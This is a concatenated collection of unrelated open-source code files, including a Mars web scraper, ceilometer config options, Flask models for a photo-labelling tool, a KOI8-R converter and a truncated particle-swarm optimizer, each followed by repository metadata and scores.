def __init__(self, id):
self.id = id
def execute(self):
print('Ejecutando Drop')
print('id : ' + self.id)
class CreateTable():
def __init__(self, id, base, cols, inh):
        self.id = id
self.base = base
self.cols = cols
self.inh = inh
def execute(self,ts):
print('Ejecutando Creare Table')
print('id : ' + str(self.id))
for col in self.cols :
print('col id : ' + str(col.id))
print('col type : ' + str(col.tipo))
if self.inh != None :
print('Inherit : ' + self.inh)
class Insert():
def __init__(self, id, vals):
print('init')
self.id = id
self.vals = vals
def execute(self):
print('Ejecutando Insert')
print('id : ' + str(self.id))
for val in self.vals:
print('value : ' + str(val))
class Delete():
def __init__(self, id, cond):
self.id = id
self.cond = cond
def execute(self):
print('Ejecutando Delete')
print('id : ' + str(self.id))
class Update():
def __init__(self, id, vals):
self.id = id
self.vals = vals
def execute(self):
print('Ejecutando Update')
        print('id : ' + str(self.id))
'''
import tabla_simbolos as TS
import Errores as E
#Creación de la tabla de simbolos
ts_global = TS.tabla_simbolos()
#Creación de lista de errores
ls_error = []
def create_table(db, nombre, columnas, ts):
nueva_tabla = TS.Simbolo(nombre, TS.tipo_simbolo.TABLE, None, db, None, None, None, None)
x = columnas.split(",")
for i in x:
c = i.split(":")
print('El nombre es -> ' + c[0] + ' y el tipo es -> ' + c[1])
#create_column(db, nombre, c[0], c[1], ts)
ts.agregar_simbolo(nueva_tabla)
return ts
def create_column(db, tabla, columna, tipo, ts):
nueva_columna = TS.Simbolo(columna,TS.tipo_simbolo.INTEGER,None,db,0,True,False,None)
agregar = ts.agregar_columna(tabla, db, nueva_columna)
''' | 2.6875 | 3 |
scrape_mars.py | asianhenry/web-scraping-challenge | 0 | 12796232 | #!/usr/bin/env python
# coding: utf-8
def scrape():
import pandas as pd
from splinter import Browser
from bs4 import BeautifulSoup
import time
#dictionary with all data
mars_data={}
executable_path = {'executable_path': 'chromedriver.exe'}
browser = Browser('chrome', **executable_path, headless=True, user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)')
url_1 = 'https://mars.nasa.gov/news/'
browser.visit(url_1)
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
search = soup.find('section', class_= 'grid_gallery module list_view')
title_search = search.find_all('div', class_= 'content_title',limit=1)
p_search = search.find_all('div', class_='article_teaser_body',limit=1)
news_title = title_search[0].a.text
news_p = p_search[0].text
#add data to dictionary
mars_data['news_title']=news_title
mars_data['news_p']=news_p
url_2='https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars'
browser.visit(url_2)
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
#click the full image button
click1=browser.find_by_css('a[class="button fancybox"]').click()
##click1=browser.links.find_by_partial_text('FULL IMAGE').click()
#click the more info button
click2=browser.links.find_by_partial_text('more info').click()
#parse the page
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
#find the link to the full size image
img_partial = soup.find_all('img',class_='main_image')[0]['src']
featured_img_url = f'https://www.jpl.nasa.gov{img_partial}'
mars_data['featured_img_url']=featured_img_url
featured_img_url
twitter_url = 'https://twitter.com/MarsWxReport?lang=en'
browser.visit(twitter_url)
time.sleep(2)
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
tweet_search = soup.find_all('article')
mars_weather=tweet_search[0].find_all('span')[4].text
mars_data['mars_weather']=mars_weather
mars_weather
facts_url = 'https://space-facts.com/mars/'
browser.visit(facts_url)
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
facts_table = pd.read_html(facts_url)
mars_table = facts_table[0]
mars_table = mars_table.rename(columns = {0:'Mars Planet Profile',1:''})
mars_table = mars_table.set_index('Mars Planet Profile', drop=True)
mars_table
mars_table.to_html('mars_html')
mars_data['mars_facts']=mars_table.to_html(justify='left')
hemisphere_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'
base_url = 'https://astrogeology.usgs.gov/'
browser.visit(hemisphere_url)
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
#click the image link to get to the page with the full res image
browser.find_by_css('img[class="thumb"]')[0].click()
#get html again after clicking page
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
#find image link and title
img_search = soup.find_all('img',class_='wide-image' )
title_search = soup.find_all('h2',class_='title')
#titles had the word 'enhanced' at the end, just getting rid of that
' '.join(title_search[0].text.split(' ')[:-1])
img_link = base_url + img_search[0]['src']
img_link
#do all of the step above for each hemisphere
img_urls =[]
titles=[]
for i in range(4):
browser.visit(hemisphere_url)
time.sleep(1)
browser.find_by_css('img[class="thumb"]')[i].click()
time.sleep(1)
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
img_search = soup.find_all('img',class_='wide-image' )
title_search = soup.find_all('h2',class_='title')
titles.append(' '.join(title_search[0].text.split(' ')[:-1]))
img_urls.append(base_url + img_search[0]['src'])
img_urls
titles
hemisphere_image_urls = []
urls ={}
for i in range(4):
urls['title']=titles[i]
urls['img_url']=img_urls[i]
hemisphere_image_urls.append(urls)
urls={}
mars_data['hemisphere_image_urls']=hemisphere_image_urls
hemisphere_image_urls
return mars_data
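# --- Usage sketch (illustrative only): requires chromedriver.exe next to the
# --- script and a working network connection, since scrape() drives a real
# --- browser session.
if __name__ == '__main__':
    mars = scrape()
    print(mars['news_title'])
    print(mars['featured_img_url'])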
| 3.234375 | 3 |
python/exercicios_avaliativos/cap_3/fibonacci.py | alavarsedouglas/fiap_repository | 0 | 12796233 | <filename>python/exercicios_avaliativos/cap_3/fibonacci.py
f = []
f.append(1)
f.append(1)
n = 0
test = int(input('Digite a posição desejada para saber o número de Fibonacci: '))
while n <= test:
f.append(f[n] + f[n+1])
n += 1
print('O número da posição {} é: {} na sequência de Fibonacci!'.format(n-1, f[n-2]))
| 4.125 | 4 |
packages/python.py | zpcc/mpkg-pkgs | 1 | 12796234 | from mpkg.common import Soft
from mpkg.utils import Search
class Package(Soft):
ID = 'python'
def _prepare(self):
data = self.data
links = {'32bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}.exe',
'64bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}-amd64.exe'}
url = 'https://www.python.org/'
data.ver = Search(url, 'Latest: .*Python ([\\d\\.]+)')
data.changelog = f'https://docs.python.org/release/{data.ver}/whatsnew/changelog.html#changelog'
data.arch = Search(links=links, ver=data.ver)
| 2.328125 | 2 |
ceilometer/opts.py | andymcc/ceilometer | 0 | 12796235 | # Copyright 2014 eNovance
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
import socket
from keystoneauth1 import loading
from oslo_config import cfg
import ceilometer.agent.manager
import ceilometer.api.app
import ceilometer.api.controllers.v2.root
import ceilometer.collector
import ceilometer.compute.discovery
import ceilometer.compute.util
import ceilometer.compute.virt.inspector
import ceilometer.compute.virt.libvirt.inspector
import ceilometer.compute.virt.vmware.inspector
import ceilometer.compute.virt.xenapi.inspector
import ceilometer.coordination
import ceilometer.dispatcher
import ceilometer.dispatcher.file
import ceilometer.dispatcher.gnocchi_opts
import ceilometer.dispatcher.http
import ceilometer.energy.kwapi
import ceilometer.event.converter
import ceilometer.exchange_control
import ceilometer.hardware.discovery
import ceilometer.hardware.pollsters.generic
import ceilometer.image.discovery
import ceilometer.ipmi.notifications.ironic
import ceilometer.ipmi.platform.intel_node_manager
import ceilometer.ipmi.pollsters
import ceilometer.keystone_client
import ceilometer.meter.notifications
import ceilometer.middleware
import ceilometer.neutron_client
import ceilometer.notification
import ceilometer.nova_client
import ceilometer.objectstore.rgw
import ceilometer.objectstore.swift
import ceilometer.pipeline
import ceilometer.publisher.messaging
import ceilometer.publisher.utils
import ceilometer.sample
import ceilometer.storage
import ceilometer.utils
import ceilometer.volume.discovery
OPTS = [
cfg.StrOpt('host',
default=socket.gethostname(),
sample_default='<your_hostname>',
help='Name of this node, which must be valid in an AMQP '
'key. Can be an opaque identifier. For ZeroMQ only, must '
'be a valid host name, FQDN, or IP address.'),
cfg.IntOpt('http_timeout',
default=600,
help='Timeout seconds for HTTP requests. Set it to None to '
'disable timeout.'),
]
def list_opts():
# FIXME(sileht): readd pollster namespaces in the generated configfile
# This have been removed due to a recursive import issue
return [
('DEFAULT',
itertools.chain(ceilometer.agent.manager.OPTS,
ceilometer.api.app.OPTS,
ceilometer.compute.util.OPTS,
ceilometer.compute.virt.inspector.OPTS,
ceilometer.compute.virt.libvirt.inspector.OPTS,
ceilometer.dispatcher.OPTS,
ceilometer.ipmi.notifications.ironic.OPTS,
ceilometer.middleware.OPTS,
ceilometer.nova_client.OPTS,
ceilometer.objectstore.swift.OPTS,
ceilometer.pipeline.OPTS,
ceilometer.sample.OPTS,
ceilometer.utils.OPTS,
ceilometer.exchange_control.EXCHANGE_OPTS,
OPTS)),
('api', itertools.chain(ceilometer.api.app.API_OPTS,
ceilometer.api.controllers.v2.root.API_OPTS)),
('collector', ceilometer.collector.OPTS),
('compute', ceilometer.compute.discovery.OPTS),
('coordination', ceilometer.coordination.OPTS),
('database', ceilometer.storage.OPTS),
('dispatcher_file', ceilometer.dispatcher.file.OPTS),
('dispatcher_http', ceilometer.dispatcher.http.http_dispatcher_opts),
('dispatcher_gnocchi',
ceilometer.dispatcher.gnocchi_opts.dispatcher_opts),
('event', ceilometer.event.converter.OPTS),
('hardware', itertools.chain(
ceilometer.hardware.discovery.OPTS,
ceilometer.hardware.pollsters.generic.OPTS)),
('ipmi',
itertools.chain(ceilometer.ipmi.platform.intel_node_manager.OPTS,
ceilometer.ipmi.pollsters.OPTS)),
('meter', ceilometer.meter.notifications.OPTS),
('notification', ceilometer.notification.OPTS),
('polling', ceilometer.agent.manager.POLLING_OPTS),
('publisher', ceilometer.publisher.utils.OPTS),
('publisher_notifier', ceilometer.publisher.messaging.NOTIFIER_OPTS),
('rgw_admin_credentials', ceilometer.objectstore.rgw.CREDENTIAL_OPTS),
# NOTE(sileht): the configuration file contains only the options
# for the password plugin that handles keystone v2 and v3 API
# with discovery. But other options are possible.
('service_credentials', ceilometer.keystone_client.CLI_OPTS),
('service_types',
itertools.chain(ceilometer.energy.kwapi.SERVICE_OPTS,
ceilometer.image.discovery.SERVICE_OPTS,
ceilometer.neutron_client.SERVICE_OPTS,
ceilometer.nova_client.SERVICE_OPTS,
ceilometer.objectstore.rgw.SERVICE_OPTS,
ceilometer.objectstore.swift.SERVICE_OPTS,
ceilometer.volume.discovery.SERVICE_OPTS,)),
('storage', ceilometer.dispatcher.STORAGE_OPTS),
('vmware', ceilometer.compute.virt.vmware.inspector.OPTS),
('xenapi', ceilometer.compute.virt.xenapi.inspector.OPTS),
]
def list_keystoneauth_opts():
# NOTE(sileht): the configuration file contains only the options
# for the password plugin that handles keystone v2 and v3 API
# with discovery. But other options are possible.
return [('service_credentials', (
loading.get_auth_common_conf_options() +
loading.get_auth_plugin_conf_options('password')))]
| 0.964844 | 1 |
vktrainer/models.py | pmourlanne/VKTrainer | 0 | 12796236 | # -*- coding: utf-8 -*-
import json
import os
import random
from shutil import copyfile
from flask import url_for, current_app as app
from flask_login import UserMixin
from sqlalchemy import func, desc
# from vktrainer import db, app, login_manager
from vktrainer import db, login_manager
from vktrainer.utils import get_md5
photos = db.Table('training_set_photos',
db.Column('training_set_id', db.Integer, db.ForeignKey('training_set.id')),
db.Column('photo_id', db.Integer, db.ForeignKey('photo.id'))
)
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64))
def __repr__(self):
return self.name
@classmethod
def get_or_create(cls, name):
user = cls.query.filter(cls.name == name).first()
if not user:
user = cls(name=name)
db.session.add(user)
db.session.commit()
return user, True
return user, False
@login_manager.user_loader
def load_user(userid):
return User.query.filter(User.id == userid).first()
class Photo(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64))
picture = db.Column(db.String(128))
md5 = db.Column(db.String(64))
PICTURES_FOLDER = 'pictures/'
@classmethod
def create_from_file(cls, file, check_if_exists=True):
# We check no photo with the same md5 already exists in db
md5 = get_md5(file)
if check_if_exists:
photo = cls.query.filter_by(md5=md5).first()
if photo is not None:
return None
# We copy the file
_, filename = os.path.split(file)
path = os.path.join('vktrainer', cls.PICTURES_FOLDER, md5)
copyfile(file, path)
name, _ = os.path.splitext(filename)
photo = Photo(name=name, md5=md5, picture=path)
db.session.add(photo)
db.session.commit()
return photo
def get_path(self):
return os.path.join(self.PICTURES_FOLDER, self.md5)
def get_absolute_url(self):
return url_for('vktrainer.show_photo', pk=self.id)
class TrainingSet(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64))
photos = db.dynamic_loader(
'Photo', secondary=photos, backref=db.backref('training_sets', lazy='dynamic'))
def __str__(self):
return self.name
def get_absolute_url(self):
return url_for('vktrainer.training_set', pk=self.id)
def get_results_url(self):
return url_for('vktrainer.training_set_results', pk=self.id)
def get_leaderboard_url(self):
return url_for('vktrainer.training_set_leaderboard', pk=self.id)
def get_results(self):
return [tr.get_pretty_result() for tr in self.training_results.all()]
def get_leaderboard(self):
count = func.count(TrainingResult.id)
return self.training_results.join(
TrainingResult.user,
).add_column(
count,
).group_by(
TrainingResult.user_id,
).order_by(
desc(count),
).values(
User.name,
count,
)
def get_percentage_done(self):
nb_photos_with_results = self.photos.filter(
Photo.id.in_(self.training_results.with_entities(TrainingResult.photo_id))
).count()
nb_photos = self.photos.count()
return float(nb_photos_with_results) / nb_photos * 100
def get_first_photo(self):
if app.config['SHOW_PICTURES_ORDERING'] == 'linear':
return self.photos.order_by('id').first()
else:
return self._get_next_photo_semi_random(None)
def get_next_photo(self, photo):
if app.config['SHOW_PICTURES_ORDERING'] == 'linear':
return self._get_next_photo_linear(photo)
else:
return self._get_next_photo_semi_random(photo)
def _get_next_photo_linear(self, photo):
next_photo = self.photos.filter(Photo.id > photo.id).order_by('id').first()
if not next_photo:
# We are already at the last photo, we show the first one
next_photo = self.photos.order_by('id').first()
return next_photo
def _get_previous_photo_linear(self, photo):
previous_photo = self.photos.filter(Photo.id < photo.id).order_by('-id').first()
if not previous_photo:
# We are already at the first photo, we show the last one
previous_photo = self.photos.order_by('-id').first()
return previous_photo
def _get_next_photo_semi_random(self, photo):
"""
We serve a random photo without any results
If there aren't any, we serve a random photo
"""
photos_without_results = self.photos.filter(~Photo.id.in_(
self.training_results.with_entities(TrainingResult.photo_id)
))
if photo:
photos_without_results = photos_without_results.filter(Photo.id != photo.id)
nb_photos_without_results = photos_without_results.count()
if nb_photos_without_results:
return photos_without_results.all()[random.randint(0, nb_photos_without_results - 1)]
else:
nb_photos = self.photos.count()
random_nb = random.randint(0, nb_photos - 1)
return self.photos.all()[random_nb]
def _get_previous_photo_semi_random(self, photo):
# Don't want to allow previous photo in semi random mode (breaks UX)
return None
class TrainingPattern(db.Model):
id = db.Column(db.Integer, primary_key=True)
training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id'))
name = db.Column(db.String(64))
instruction = db.Column(db.Text)
training_set = db.relation('TrainingSet', backref=db.backref('patterns', lazy='dynamic'))
pattern_ref = db.Column(db.String(64))
position = db.Column(db.Integer)
@property
def pattern(self):
from .patterns import REF_TO_PATTERN_CLASS
try:
return REF_TO_PATTERN_CLASS[self.pattern_ref]
except KeyError:
raise KeyError('Unknown pattern: {}'.format(self.pattern_ref))
class TrainingResult(db.Model):
id = db.Column(db.Integer, primary_key=True)
training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id'))
photo_id = db.Column(db.Integer, db.ForeignKey('photo.id'))
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
training_set = db.relation('TrainingSet', backref=db.backref('training_results', lazy='dynamic'))
photo = db.relation('Photo')
user = db.relation('User', lazy='joined', backref=db.backref('training_results'))
result = db.Column(db.Text) # Result stored in JSON
photo_is_incorrect = db.Column(db.Boolean, default=False)
def get_absolute_url(self):
return url_for(
'vktrainer.training_set_result',
training_set_pk=self.training_set.id,
result_pk=self.id,
)
def get_pretty_result(self):
if self.photo_is_incorrect:
result = 'Photo marked as incorrect'
else:
try:
loaded_result = json.loads(self.result)
except ValueError:
# Could not decode JSON
loaded_result = None
if loaded_result:
result = {
'state': 'OK',
'value': loaded_result,
}
else:
result = {
'state': 'KO',
'value': {},
}
return {
'photo': {
'name': self.photo.name,
'id': self.photo.id,
},
'user': self.user.name if self.user else None,
'result': result,
'id': self.id,
'url': self.get_absolute_url(),
}
@classmethod
def create(cls, photo, training_set, user, result, **kwargs):
training_result = cls(
photo=photo,
training_set=training_set,
user=user,
result=result,
**kwargs
)
db.session.add(training_result)
db.session.commit()
return training_result
| 2.375 | 2 |
mc3/stats/prayer.py | alulujasmine/mc3 | 6 | 12796237 | <reponame>alulujasmine/mc3
# Copyright (c) 2015-2021 <NAME> and contributors.
# mc3 is open-source software under the MIT license (see LICENSE).
__all__ = [
"prayer_beads",
]
def prayer_beads(data=None, nprays=0):
"""
Implement a prayer-bead method to estimate parameter uncertainties.
Parameters
----------
data: 1D float ndarray
A time-series dataset.
nprays: Integer
Number of prayer-bead shifts. If nprays=0, set to the number
of data points.
Notes
-----
Believing in a prayer bead is a mere act of faith, please don't
do that, we are scientists for god's sake!
"""
print(
"Believing in prayer beads is a mere act of faith, please don't use it"
"\nfor published articles (see Cubillos et al. 2017, AJ, 153).")
return None
| 2.546875 | 3 |
kaldi/lm/__init__.py | mxmpl/pykaldi | 916 | 12796238 | from ._arpa_file_parser import ArpaParseOptions
from ._arpa_lm_compiler import *
from ._const_arpa_lm import *
from ._kaldi_rnnlm import *
__all__ = [name for name in dir()
if name[0] != '_'
and not name.endswith('Base')]
| 1.242188 | 1 |
Python/CeV/Exercicios/ex38.py | WerickL/Learning | 0 | 12796239 | <filename>Python/CeV/Exercicios/ex38.py<gh_stars>0
from math import floor
n1 = float(input('Digite um número inteiro:'))
n2 = float(input('Digite outro número inteiro:'))
if floor(n1) > floor(n2):
print('O primeiro número é maior que o segundo!')
elif floor(n1) < floor(n2):
print('O segundo número é maior que o primeiro')
else:
print('Os dois números são iguais!')
| 4.09375 | 4 |
Implementations/Kattis/others/02/Impl-02-2/armystrenghteasy.py | MilladMuhammadi/Competitive-Programming | 0 | 12796240 | for i in range(int(input())):
input()
Ng,Nm = map(int,input().split())
g=list(map(int,input().split()))
m=list(map(int,input().split()))
g.sort()
m.sort()
gg,mm=0,0
while (gg<Ng and mm<Nm):
if (m[mm]<=g[gg]):
mm+=1
else:
gg+=1
if (gg==Ng):
print("MechaGodzilla")
elif (mm==Nm):
print("Godzilla")
else:
print("uncertain") | 3.296875 | 3 |
raspberrypi/python/python1_test.py | dambergn/programing-examples | 0 | 12796241 | <filename>raspberrypi/python/python1_test.py
#!/usr/bin/python
print 'Python1 Test Successful'
Python/pyworkout/modules_and_packages/menu/__init__.py | honchardev/Fun | 0 | 12796242 | from menu.menu import menu | 1.0625 | 1 |
test/integration/ggrc/models/test_document.py | Killswitchz/ggrc-core | 0 | 12796243 | <reponame>Killswitchz/ggrc-core<filename>test/integration/ggrc/models/test_document.py<gh_stars>0
# Copyright (C) 2017 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Integration tests for Document"""
from ggrc.models import all_models
from integration.ggrc import TestCase
from integration.ggrc.api_helper import Api
from integration.ggrc import generator
from integration.ggrc.models import factories
class TestDocument(TestCase):
"""Document test cases"""
# pylint: disable=invalid-name
def setUp(self):
super(TestDocument, self).setUp()
self.api = Api()
self.gen = generator.ObjectGenerator()
def test_update_title(self):
"""Test update document title."""
create_title = "test_title"
update_title = "update_test_title"
document = factories.DocumentFactory(title=create_title)
response = self.api.put(document, {"title": update_title})
self.assert200(response)
self.assertEqual(all_models.Document.query.get(document.id).title,
update_title)
def create_document_by_type(self, doc_type):
"""Create docuemtn with sent type."""
data = {
"title": "test_title",
"link": "test_link",
}
if doc_type is not None:
data["document_type"] = doc_type
doc_type = doc_type or all_models.Document.URL
resp, doc = self.gen.generate_object(
all_models.Document,
data
)
self.assertTrue(
all_models.Document.query.filter(
all_models.Document.id == resp.json["document"]['id'],
all_models.Document.document_type == doc_type,
).all()
)
return (resp, doc)
def test_create_url(self):
"""Test create url."""
self.create_document_by_type(all_models.Document.URL)
def test_create_url_default(self):
"""Test create url(default)."""
self.create_document_by_type(None)
def test_create_evidence(self):
"""Test create evidence."""
self.create_document_by_type(all_models.Document.ATTACHMENT)
def test_create_invalid_type(self):
"""Test validation document_type."""
data = {
"document_type": 3,
"title": "test_title",
"link": "test_link",
"owners": [self.gen.create_stub(all_models.Person.query.first())],
}
obj_name = all_models.Document._inflector.table_singular
obj = all_models.Document()
obj_dict = self.gen.obj_to_dict(obj, obj_name)
obj_dict[obj_name].update(data)
resp = self.api.post(all_models.Document, obj_dict)
self.assert400(resp)
self.assertEqual('"Invalid value for attribute document_type. '
'Expected options are `URL`, `EVIDENCE`, '
'`REFERENCE_URL`"',
resp.data)
| 2.140625 | 2 |
vdpwi/utils/preprocess.py | achyudh/castor | 132 | 12796244 | import argparse
import os
from scipy.special import erf
from scipy.stats import truncnorm
import numpy as np
import data
def build_vector_cache(glove_filename, vec_cache_filename, vocab):
print("Building vector cache...")
with open(glove_filename) as f, open(vec_cache_filename, "w") as f2:
for line in f:
tok, vec = line.split(" ", 1)
if tok in vocab:
vocab.remove(tok)
f2.write("{} {}".format(tok, vec))
def discrete_tnorm(a, b, tgt_loc, sigma=1, n_steps=100):
def phi(zeta):
return 1 / (np.sqrt(2 * np.pi)) * np.exp(-0.5 * zeta**2)
def Phi(x):
return 0.5 * (1 + erf(x / np.sqrt(2)))
def tgt_loc_update(x):
y1 = phi((a - x) / sigma)
y2 = phi((b - x) / sigma)
x1 = Phi((b - x) / sigma)
x2 = Phi((a - x) / sigma)
denom = x1 - x2 + 1E-4
return y1 / denom - y2 / denom
x = tgt_loc
direction = np.sign(tgt_loc - (b - a))
for _ in range(n_steps):
x = tgt_loc - sigma * tgt_loc_update(x)
tn = truncnorm((a - x) / sigma, (b - x) / sigma, loc=x, scale=sigma)
rrange = np.arange(a, b + 1)
pmf = tn.pdf(rrange)
pmf /= np.sum(pmf)
return pmf
def discrete_lerp(a, b, ground_truth):
pmf = np.zeros(b - a + 1)
c = int(np.ceil(ground_truth + 1E-8))
f = int(np.floor(ground_truth))
pmf[min(c - a, b - a)] = ground_truth - f
pmf[f - a] = c - ground_truth
return pmf
def smoothed_labels(truth, n_labels):
return discrete_lerp(1, n_labels, truth)
def preprocess(filename, output_name="sim_sparse.txt"):
print("Preprocessing {}...".format(filename))
with open(filename) as f:
values = [float(l.strip()) for l in f.readlines()]
values = [" ".join([str(l) for l in smoothed_labels(v, 5)]) for v in values]
with open(os.path.join(os.path.dirname(filename), output_name), "w") as f:
f.write("\n".join(values))
def add_vocab(tok_filename, vocab):
with open(tok_filename) as f:
for line in f:
vocab.update(line.strip().split())
def main():
base_conf = data.Configs.base_config()
sick_conf = data.Configs.sick_config()
sick_folder = sick_conf.sick_data
vocab = set()
for name in ("train", "dev", "test"):
preprocess(os.path.join(sick_folder, name, "sim.txt"))
add_vocab(os.path.join(sick_folder, name, "a.toks"), vocab)
add_vocab(os.path.join(sick_folder, name, "b.toks"), vocab)
build_vector_cache(base_conf.wordvecs_file, sick_conf.sick_cache, vocab)
if __name__ == "__main__":
main()
| 2.34375 | 2 |
unicode2koi8r.py | SlimyMonkey/divePython | 1 | 12796245 | <reponame>SlimyMonkey/divePython
"""Convert Cyrillic from iso-8859-1 Unicode-encoded to KOI8-R-encoded
This script is used during the build process of the Russian translation
of "Dive Into Python" (http://diveintopython.org/).
It takes one argument, which can be either an HTML file or a directory.
If a file, it converts the file in place; if a directory, it converts
every HTML file in the immediate directory (but not recursively).
Safe but pointless to run more than once on the same file or directory.
"""
__author__ = "<NAME> (<EMAIL>)"
__version__ = "$Revision: 1.2 $"
__date__ = "$Date: 2004/05/05 21:57:19 $"
__copyright__ = "Copyright (c) 2001 <NAME>"
__license__ = "Python"
import os
import sys
import re
unicodeToKOI8R = { \
'Ё': '\xb3',
'А': '\xe1',
'Б': '\xe2',
'В': '\xf7',
'Г': '\xe7',
'Д': '\xe4',
'Е': '\xe5',
'Ж': '\xf6',
'З': '\xfa',
'И': '\xe9',
'Й': '\xea',
'К': '\xeb',
'Л': '\xec',
'М': '\xed',
'Н': '\xee',
'О': '\xef',
'П': '\xf0',
'Р': '\xf2',
'С': '\xf3',
'Т': '\xf4',
'У': '\xf5',
'Ф': '\xe6',
'Х': '\xe8',
'Ц': '\xe3',
'Ч': '\xfe',
'Ш': '\xfb',
'Щ': '\xfd',
'Ъ': '\xff',
'Ы': '\xf9',
'Ь': '\xf8',
'Э': '\xfc',
'Ю': '\xe0',
'Я': '\xf1',
'а': '\xc1',
'б': '\xc2',
'в': '\xd7',
'г': '\xc7',
'д': '\xc4',
'е': '\xc5',
'ж': '\xd6',
'з': '\xda',
'и': '\xc9',
'й': '\xca',
'к': '\xcb',
'л': '\xcc',
'м': '\xcd',
'н': '\xce',
'о': '\xcf',
'п': '\xd0',
'р': '\xd2',
'с': '\xd3',
'т': '\xd4',
'у': '\xd5',
'ф': '\xc6',
'х': '\xc8',
'ц': '\xc3',
'ч': '\xde',
'ш': '\xdb',
'щ': '\xdd',
'ъ': '\xdf',
'ы': '\xd9',
'ь': '\xd8',
'э': '\xdc',
'ю': '\xc0',
'я': '\xd1',
'ё': '\xa3' }
unicodePattern = re.compile(r'&#[0-9]{4,4};')
charsetPattern = re.compile(r'ISO-8859-1', re.IGNORECASE)
def translateMatch(match):
unicode = match.group(0)
if unicodeToKOI8R.has_key(unicode):
return unicodeToKOI8R[unicode]
else:
return unicode
def translateBuffer(buffer):
buffer = unicodePattern.sub(translateMatch, buffer)
buffer = charsetPattern.sub('KOI8-R', buffer)
return buffer
def translateFile(filename, outfilename=None):
if not outfilename:
outfilename = filename
fsock = open(filename)
buffer = fsock.read()
fsock.close()
buffer = translateBuffer(buffer)
fsock = open(outfilename, 'wb')
fsock.write(buffer)
fsock.close()
def htmlFilter(filename):
return os.path.splitext(filename)[1] == '.html'
def translateDirectory(directoryname, filterFunc=htmlFilter):
fileList = [os.path.join(directoryname, f) for f in os.listdir(directoryname)]
fileList = filter(filterFunc, fileList)
map(translateFile, fileList)
if __name__ == "__main__":
name = sys.argv[1]
if os.path.isdir(name):
translateDirectory(name)
else:
translateFile(name)
| 2.71875 | 3 |
dramkit/optimizer/pso.py | Genlovy-Hoo/dramkit | 0 | 12796246 | <reponame>Genlovy-Hoo/dramkit
# -*- coding: utf-8 -*-
import time
import numpy as np
from dramkit.gentools import isnull
from dramkit.optimizer.utils_heuristic import rand_init
def pso(objf, func_opter_parms):
    '''
    Particle Swarm Optimization (PSO) algorithm.
    TODO
    ----
    Currently only continuous real-valued variables are handled; support for
    discrete variables may be added later.
    Parameters
    ----------
    objf : function
        Objective function. Note: it must be formulated as a minimization problem.
    func_opter_parms : FuncOpterInfo
        A :class:`dramkit.optimizer.utils_heuristic.FuncOpterInfo` instance;
        parms_func, parms_opter and parms_log must be set.
        | parms_func is a dict with the objective-function settings; its keys must include:
        |     x_lb: lower bound of each dimension, a list or a number
        |           (if a list, its length should equal dim)
        |     x_ub: upper bound of each dimension, a list or a number
        |           (if a list, its length should equal dim)
        |     dim: number of dimensions of the decision variables
        |     kwargs: extra keyword arguments passed to the objective function
        | parms_opter is a dict with the optimizer settings; its keys must include:
        |     popsize: population size (number of samples per iteration)
        |     max_iter: maximum number of iterations
        |     v_maxs: upper bound on the absolute step per dimension, a list or
        |             a number (if a list, its length should equal dim)
        |     w_max: maximum inertia factor w; w balances global and local
        |            search, and larger values favour global exploration
        |     w_min: minimum inertia factor
        |     w_fix: if set to a value in (0, 1), the inertia factor w is fixed
        |            to w_fix and is not updated dynamically
        |     (by default w is updated dynamically with a linear decrease)
        |     c1, c2: learning factors
        | parms_log is a dict with the logging settings; its keys must include:
        |     logger: the logger
        |     nshow: if an integer, log the current best objective value every
        |            nshow iterations
    Returns
    -------
    func_opter_parms : FuncOpterInfo
        func_opter_parms updated with the optimization results
    References
    ----------
    - https://www.jianshu.com/p/8c0260c21af4
    - https://github.com/7ossam81/EvoloPy
    '''
    # extract parameters
    opter_name = func_opter_parms.parms_opter['opter_name']
    if opter_name == '' or isnull(opter_name):
        opter_name = 'pso'
    func_opter_parms.parms_opter['opter_name'] = opter_name
    # objective function parameters
    x_lb = func_opter_parms.parms_func['x_lb']
    x_ub = func_opter_parms.parms_func['x_ub']
    dim = func_opter_parms.parms_func['dim']
    kwargs = func_opter_parms.parms_func['kwargs']
    # optimizer parameters
    popsize = func_opter_parms.parms_opter['popsize']
    max_iter = func_opter_parms.parms_opter['max_iter']
    v_maxs = func_opter_parms.parms_opter['v_maxs']
    w_max = func_opter_parms.parms_opter['w_max']
    w_min = func_opter_parms.parms_opter['w_min']
    w_fix = func_opter_parms.parms_opter['w_fix']
    c1 = func_opter_parms.parms_opter['c1']
    c2 = func_opter_parms.parms_opter['c2']
    # logging parameters
    logger = func_opter_parms.parms_log['logger']
    nshow = func_opter_parms.parms_log['nshow']
    # timing
    strt_tm = time.time()
    func_opter_parms.set_start_time(time.strftime('%Y-%m-%d %H:%M:%S'))
    # normalize bounds to lists
if not isinstance(x_lb, list):
x_lb = [x_lb] * dim
if not isinstance(x_ub, list):
x_ub = [x_ub] * dim
if not isinstance(v_maxs, list):
if isnull(v_maxs):
v_maxs = [(x_ub[_]-x_lb[_]) / 10 for _ in range(dim)]
else:
v_maxs = [v_maxs] * dim
